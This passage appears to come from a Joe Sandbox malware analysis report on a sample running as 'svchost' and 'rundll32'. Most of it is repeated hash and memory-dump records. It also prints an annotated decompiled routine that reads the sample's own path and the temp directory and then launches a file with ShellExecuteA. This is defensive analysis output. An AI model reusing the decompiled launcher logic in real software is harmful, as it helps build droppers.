                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteIconInfoObject
                                                                          • String ID: ,k@
                                                                          • API String ID: 2689914137-1053005162
                                                                          • Opcode ID: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                          • Instruction ID: 6eb33a66848ac9ac3950d349fa1ce54abc8aaa9849f71adcceb630d577d3c1da
                                                                          • Opcode Fuzzy Hash: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                          • Instruction Fuzzy Hash: B7414C71E0021A9FDF10DF99C881AAEBBB4FF48318F11406AD911B7381D778AD95CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 72%
                                                                          			// Decompiler output from the sandbox's IDA plugin. The address after each statement is the
                                                                          			// instruction address the report lists for it; it matches the "ref:" values in the APIs list below.
                                                                          			E004078A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                          				char* _t39;
                                                                          				void* _t40;
                                                                          				void* _t46;
                                                                          				intOrPtr _t57;
                                                                          				void* _t61;
                                                                          
                                                                          				_t60 = __esi;                                                  // 0x004078a6
                                                                          				_t59 = __edi;                                                  // 0x004078a6
                                                                          				_t46 = __ecx;                                                  // 0x004078a6
                                                                          				_t45 = __ebx;                                                  // 0x004078a6
                                                                          				// E004049D0 calls GetModuleFileNameA and GetCommandLineA (see APIs below)
                                                                          				E004049D0(0, __ebx, _t61 - 0xa244, __edi, __esi);              // 0x004078ae
                                                                          				E00404EEC(_t61 - 0xa240);                                      // 0x004078bf
                                                                          				// Working directory is switched to a path derived from the module's own location
                                                                          				SetCurrentDirectoryA(E0040340C( *((intOrPtr*)(_t61 - 0xa240)))); // 0x004078d0
                                                                          				_push(1);                                                      // 0x004078d5
                                                                          				_push(0);                                                      // 0x004078d7
                                                                          				E00406F34(1, __ebx, _t61 - 0xa248, __edi, __esi);              // 0x004078e1
                                                                          				_push(E0040340C( *((intOrPtr*)(_t61 - 0xa248))));              // 0x004078f1
                                                                          				// E00405008 calls GetTempPathA (see APIs below)
                                                                          				E00405008(_t61 - 0xa250, _t45, _t46);                          // 0x004078f8
                                                                          				E004031F4(_t61 - 0xa254, 9, 0x4091b4);                         // 0x00407913
                                                                          				E004049D0(0, _t45, _t61 - 0xa25c, _t59, _t60);                 // 0x00407926
                                                                          				E00404ED0( *((intOrPtr*)(_t61 - 0xa25c)), _t61 - 0xa258);      // 0x00407937
                                                                          				E004032CC();                                                   // 0x0040794d
                                                                          				_t39 = E0040340C( *((intOrPtr*)(_t61 - 0xa24c)));              // 0x00407958  file passed to ShellExecuteA
                                                                          				_t40 =  *0x40a650; // 0x400000 (image base, used as the hwnd)   // 0x00407963
                                                                          				// ShellExecuteA(hwnd, verb, file, parameters, directory, show command) with the "open" verb
                                                                          				ShellExecuteA(_t40, "open", _t39,  *(_t61 - 0xa258),  *(_t61 - 0xa254),  *(_t61 - 0xa250)); // 0x00407969
                                                                          				_pop(_t57);                                                    // 0x00407970
                                                                          				 *[fs:eax] = _t57;                                             // 0x00407973  restores the previous exception handler (fs:[0])
                                                                          				_push(E00407993);                                              // 0x00407976
                                                                          				return E004030B8(_t61 - 0xa25c, 0x14);                         // 0x0040798b
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004078D0
                                                                            • Part of subcall function 00405008: GetTempPathA.KERNEL32(00000105,?,00000000,00405072,?,00000000), ref: 00405036
                                                                            • Part of subcall function 004049D0: GetCommandLineA.KERNEL32(00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000,?,00408179,00000000,00408220), ref: 00404A23
                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00407969
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                          • String ID: open
                                                                          • API String ID: 2622400689-2758837156
                                                                          • Opcode ID: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                          • Instruction ID: bc53e8da7d6e16968f2b3cdc64b9b09c5d4ffb8ac025ca0eed744acd73de400d
                                                                          • Opcode Fuzzy Hash: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                          • Instruction Fuzzy Hash: 83113070B107198ADB10FB79CC41A8DB779FF85308F0085F6B108BB192D67E9E858E5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,Function_00004ADA), ref: 0040E4A1
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00411368
                                                                            • Part of subcall function 0040EAA0: GetTempPathA.KERNEL32(00000105,?,00000000,Function_00005072), ref: 0040EACE
                                                                            • Part of subcall function 0040E468: GetCommandLineA.KERNEL32(00000000,Function_00004ADA), ref: 0040E4BB
                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                          • String ID: open
                                                                          • API String ID: 2622400689-2758837156
                                                                          • Opcode ID: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                          • Instruction ID: ca9bbc1aa8f47e6c3f9ee794e5cc2909a51f6400e8153674fcf191bbd04044bb
                                                                          • Opcode Fuzzy Hash: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                          • Instruction Fuzzy Hash: D211ED70F043198EEB10FB79CC81A89B375EF86308F4049B6A008B7191D67E6E858E5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Executed Functions

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `l
                                                                          • API String ID: 0-379310572
                                                                          • Opcode ID: 25e0e1613d2a5ca9237662001fb4aed1b2781c927bc90daf1beb2f93060e3545
                                                                          • Instruction ID: 48635cbed6b0e433e90d86c9578a476350f00735dfb7b6592cca2020d400b5d6
                                                                          • Opcode Fuzzy Hash: 25e0e1613d2a5ca9237662001fb4aed1b2781c927bc90daf1beb2f93060e3545
                                                                          • Instruction Fuzzy Hash: F691B230B10214DFDB349F64E8587AEBBB2FF85704F148529E4469B792DB34AC89DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 076e239bec5eefb527b9e9731266c29d23db00e046af83143c1dbf7a37d7d0fe
                                                                          • Instruction ID: 37a672c5d11d6086d69a5951cb38d75d3c25b03153bacbf0fa3db6b8f8637594
                                                                          • Opcode Fuzzy Hash: 076e239bec5eefb527b9e9731266c29d23db00e046af83143c1dbf7a37d7d0fe
                                                                          • Instruction Fuzzy Hash: 4B919D35A00615CFCB10EF64E895AAEB7B2FF88714B158569EC09AB350DF34ED05CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 608296fd641980e943839dbda3362f2bc3f02a7b22bc28bc8d9e5c0f33742be3
                                                                          • Instruction ID: b42f633a02d06a7ab7f62e57a83ff8ca760643fbbe3ce6c2fc518cffa25c8e77
                                                                          • Opcode Fuzzy Hash: 608296fd641980e943839dbda3362f2bc3f02a7b22bc28bc8d9e5c0f33742be3
                                                                          • Instruction Fuzzy Hash: 0F71C435B01A189FDB149BB5C8646BEB7A7FFC8244F258029E506AB390DF34ED029791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb11c308e23e4b0ea79519ac5e5e7095f55ed4320a0029d0303d191987536d0c
                                                                          • Instruction ID: 087949fe8c839c1c20455593740d152fe2b93eb4a9ae2d282316e29a3696db61
                                                                          • Opcode Fuzzy Hash: cb11c308e23e4b0ea79519ac5e5e7095f55ed4320a0029d0303d191987536d0c
                                                                          • Instruction Fuzzy Hash: 74A11939A10615CFCB44DFA8D58488DBBB2FF89314721C65AE905AB329EB30ED49CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c86d80bb040e803cc6023eb5ef10858391a8e6ebc4fdf807c2e0209037f17b9a
                                                                          • Instruction ID: 9b61f3c219096b8007ce6e3e2f534b38aad10a47e50c0099ddb80caf2c264e5e
                                                                          • Opcode Fuzzy Hash: c86d80bb040e803cc6023eb5ef10858391a8e6ebc4fdf807c2e0209037f17b9a
                                                                          • Instruction Fuzzy Hash: 64910939A10619CFCB44DFA8D58489DB7B2FF88314721C65AE905AB329EB70ED49CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ed7abdd0d72a1870457595e2d09604eac54fd9e357bbf1b1d218095d472659d8
                                                                          • Instruction ID: 416fce12254f7fc23aafa929118ea04021b2f2819c990c4b0223f08d598fa06c
                                                                          • Opcode Fuzzy Hash: ed7abdd0d72a1870457595e2d09604eac54fd9e357bbf1b1d218095d472659d8
                                                                          • Instruction Fuzzy Hash: FD61CE356012109FCB11EF34D891A9EBBA2EF89614B15819AEC06DF351DF34ED05CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c04576c8d6cdf4aabedabe3e5ed874440c12df1ef7ae9388ac0702c0f3fc4ad
                                                                          • Instruction ID: 9ac7d946814cd85649788ff4446ceabc6dabfa4a895371f2c378919c82090f44
                                                                          • Opcode Fuzzy Hash: 9c04576c8d6cdf4aabedabe3e5ed874440c12df1ef7ae9388ac0702c0f3fc4ad
                                                                          • Instruction Fuzzy Hash: AC51CD36B016089FCB15DF78D8506EEB7A6BFC9294B24812AD945DB354DB30EC02DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
• API String ID:
• Opcode ID: 1752909f54f20845c60023290afd58696efd5012a57c8a803f45fad3d70b59da
• Instruction ID: 824813ff88ad45647c41bb0f207f11cf20003b003ab7e1e9550c10d40ea6cefe
• Opcode Fuzzy Hash: 1752909f54f20845c60023290afd58696efd5012a57c8a803f45fad3d70b59da
• Instruction Fuzzy Hash: 095105307052109FEB149B7594647FA3BB6EFC9318F14406AE445EB381CE399C06D7D1

Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fa0e8003b24901ea3cf16deb46cd6446eef32e9d032251b73b8327c5cc393286
• Instruction ID: dfebca4d62909d142201b34816b5a2ba3c464b5d1a736f422aae0941a6f1c4f8
• Opcode Fuzzy Hash: fa0e8003b24901ea3cf16deb46cd6446eef32e9d032251b73b8327c5cc393286
• Instruction Fuzzy Hash: 27512330B156158FCB64DF68D891AAF7BE3BB89618710842AF945CB310EF30EC059BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb81d1f6ea3e6b5a289ab98c1454c046e67eb7e49ddb918ce839727f83f95346
                                                                          • Instruction ID: 31dcbbafae75044ae3e086d233b543b1ccec8f1635cae301b36158629841ff96
                                                                          • Opcode Fuzzy Hash: eb81d1f6ea3e6b5a289ab98c1454c046e67eb7e49ddb918ce839727f83f95346
                                                                          • Instruction Fuzzy Hash: 0E11B131304615AF8751AF78A89189B7BE7EFC92143148A2BF50ACB351DF70ED044BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84eb038b3279b4ca74499df1efefe0163acd96b12d6139717493f57482e98db6
                                                                          • Instruction ID: 77100f74376b0008fc419188f31bc6358dd101efa058cc3b38396f1861a72873
                                                                          • Opcode Fuzzy Hash: 84eb038b3279b4ca74499df1efefe0163acd96b12d6139717493f57482e98db6
                                                                          • Instruction Fuzzy Hash: 0411277090E7851FC716AF70A8761A53F69DE8361871644EEC18ACF193EA24DC0AD3E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e111b85e1eb735509bb84199d2c06533e70dfb4cce7e8cf0ae3234c07bb1fe5
                                                                          • Instruction ID: 3553891a01d474b4eb87b7c3cad2d914af2a3366d4802714ab42aeca25b86f4f
                                                                          • Opcode Fuzzy Hash: 0e111b85e1eb735509bb84199d2c06533e70dfb4cce7e8cf0ae3234c07bb1fe5
                                                                          • Instruction Fuzzy Hash: 2A215430A111059BEB14EFB5D864AEAB7BAEFCC358F244019E405AB380DE756D46DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4b8735d2f0b9b49728492b7ca80eaae4ab1d43b8feef5f76adc54820c2a5869b
                                                                          • Instruction ID: fe2d95e07af4deb27f31b235411ff6beb48412c7425ae6e85bf2b0cdc2fae0f3
                                                                          • Opcode Fuzzy Hash: 4b8735d2f0b9b49728492b7ca80eaae4ab1d43b8feef5f76adc54820c2a5869b
                                                                          • Instruction Fuzzy Hash: ED1125207152655BFB24367524143FF7BDEABC5618F20153ADD86FB2C1DD98AC0223E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 184e271e7925e9262f20c61fd92330c2aed082fa80de6148a42a0b32dd7bfb77
                                                                          • Instruction ID: cee81c3e92d23b95fd3c85aa2c11cf2fcc377fe1ad522776645566b7189b9f27
                                                                          • Opcode Fuzzy Hash: 184e271e7925e9262f20c61fd92330c2aed082fa80de6148a42a0b32dd7bfb77
                                                                          • Instruction Fuzzy Hash: 36214775A112049FCB44DF69D8809DEBBF1FF8C724F10816AE805AB321DB31A842CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d684224f087d081c2ce019a85058b9e8951247aa3ee9cf47df0b80027092fa58
                                                                          • Instruction ID: 8dfbddc7671bc1249d6d9e02fc8e5df7b00a348408a1c711d04bf6c2cf1c0f8a
                                                                          • Opcode Fuzzy Hash: d684224f087d081c2ce019a85058b9e8951247aa3ee9cf47df0b80027092fa58
                                                                          • Instruction Fuzzy Hash: DE218734A002059BEB14EFA5D854AEE77B6FFCC314F144029E845AB390DE35AC55DBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d2076a37ad6835ef1777fe6510c4a573c8d7b84d8cc0f9fba94bc928d35c74e4
                                                                          • Instruction ID: 85d9fa392e019bde21d2d246936e82e8124372050976fb7c4a1ac5c93835b85e
                                                                          • Opcode Fuzzy Hash: d2076a37ad6835ef1777fe6510c4a573c8d7b84d8cc0f9fba94bc928d35c74e4
                                                                          • Instruction Fuzzy Hash: FC11A331300615AF8780AF79E49199BB7D7EFC96247148A2BE90ACB351EF70ED044BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0d3971e6111d9f2a318e796cb5cb69df8e2ec7bceb857afbd6cb634f33c81704
                                                                          • Instruction ID: ec0eb3ef520ad4f11e96c6ddb0c53dc4877831acb9f23b0f1284b8d84b8327f9
                                                                          • Opcode Fuzzy Hash: 0d3971e6111d9f2a318e796cb5cb69df8e2ec7bceb857afbd6cb634f33c81704
                                                                          • Instruction Fuzzy Hash: 141191313046169F8740AF78E4915DBB793EFC86147148A2BE94ACF251EF70ED055BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb691da06e7abf564940a52559256a4ce35a47a42495c0d542754015d9d52607
                                                                          • Instruction ID: 1bab39c9bf5379249de5f43431ca54f3ac148e01a3fd8b601ef66f7a188b4111
                                                                          • Opcode Fuzzy Hash: eb691da06e7abf564940a52559256a4ce35a47a42495c0d542754015d9d52607
                                                                          • Instruction Fuzzy Hash: 77113034A001059BEB14EFA5D864AEA77B6FFCC314F148029E409AB390DE75AC45DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9482eca352aae455b55a0f17a3f8fda9c3198b0aa6cebf443105fd8b77511ded
                                                                          • Instruction ID: 0b0c71e224ca30aaa01aba6b473cceb9761e216165c1721d48a6e35376a26642
                                                                          • Opcode Fuzzy Hash: 9482eca352aae455b55a0f17a3f8fda9c3198b0aa6cebf443105fd8b77511ded
                                                                          • Instruction Fuzzy Hash: E1114F30A011059BEB54EFB5D464AA9B7B6FFCC319F244029E409AB380CE79BC45DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1d1fad9cc3fff608b8c8542ad8bf36413b41ca3ca863b1565266fc63cfdcfa08
                                                                          • Instruction ID: fb67dcba0b32003cf7e6e89bb863c965345ecceab7b7dd69a006cfe7c2a3628c
                                                                          • Opcode Fuzzy Hash: 1d1fad9cc3fff608b8c8542ad8bf36413b41ca3ca863b1565266fc63cfdcfa08
                                                                          • Instruction Fuzzy Hash: E7118131601114EFDB14DFA5D855AA97BBAEF8C328F249019E409AB380DF39AC46CFD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a60f9693a273c74d7111afe8c2c047dc43411e40d2332c2c3efb2e1f1be0c657
                                                                          • Instruction ID: 41a2c9fe8f07f69af515e6cc5968d3e37fe105184281e9d8b167b530e2d7e483
                                                                          • Opcode Fuzzy Hash: a60f9693a273c74d7111afe8c2c047dc43411e40d2332c2c3efb2e1f1be0c657
                                                                          • Instruction Fuzzy Hash: 712115B0D046088FCB10DFAAD4856EEFBF0FF48214F10842AD559A7240DB79A906CFA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 149c0eb95b7c1250a053187b8f636f7fca5399f3f346a473030f1bd57c812a1d
                                                                          • Instruction ID: cde2acf397ec6693b4e76e278d2e9fbe16df83257b94cba1e030e8e36736b7ff
                                                                          • Opcode Fuzzy Hash: 149c0eb95b7c1250a053187b8f636f7fca5399f3f346a473030f1bd57c812a1d
                                                                          • Instruction Fuzzy Hash: A011E5307052045BD714AB69D8146EFBBF6AFCA644F14846DD041AB391CE749D06DBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aac7fcd975d1d8b5ffae71a8011314a0669916fe931e2deb1cb68ba904e9c85e
                                                                          • Instruction ID: 75387cd439d5dfd5cc76c180976add9fbe3b5f5cc0497c7f8d516f9eafae5776
                                                                          • Opcode Fuzzy Hash: aac7fcd975d1d8b5ffae71a8011314a0669916fe931e2deb1cb68ba904e9c85e
                                                                          • Instruction Fuzzy Hash: 5511E531304A66AFC741AF7CE45159BBBD2EFC92243218A2BE556CB291DF70ED058BD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fd145404f76ea4b0c3a46109b51e7ab2b5f4a5a7637604c1a8208cd4663de12e
                                                                          • Instruction ID: 2f002d5bb50851885d31bedec3f5c39981cca2be911d866acffdb45b0b7890e3
                                                                          • Opcode Fuzzy Hash: fd145404f76ea4b0c3a46109b51e7ab2b5f4a5a7637604c1a8208cd4663de12e
                                                                          • Instruction Fuzzy Hash: 4A1106B0D046098FDB10DFAAC484AEEFBF4FF48314F10842AD559A7240DB79A905CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84ab4f7ea046731ff4ebd3f6ed57fdfa5ad17f148ac5c643f4e8a44af879965b
                                                                          • Instruction ID: 9a28116aed353a9ce4c2202d95b49d42c5df3ba0bb12bd04364b593860638aa0
                                                                          • Opcode Fuzzy Hash: 84ab4f7ea046731ff4ebd3f6ed57fdfa5ad17f148ac5c643f4e8a44af879965b
                                                                          • Instruction Fuzzy Hash: C9118231601114EFDB14DFA5D455AB97BBAEF8C324F105019E409AB380DF79AC45CFA0
                                                                          Uniqueness

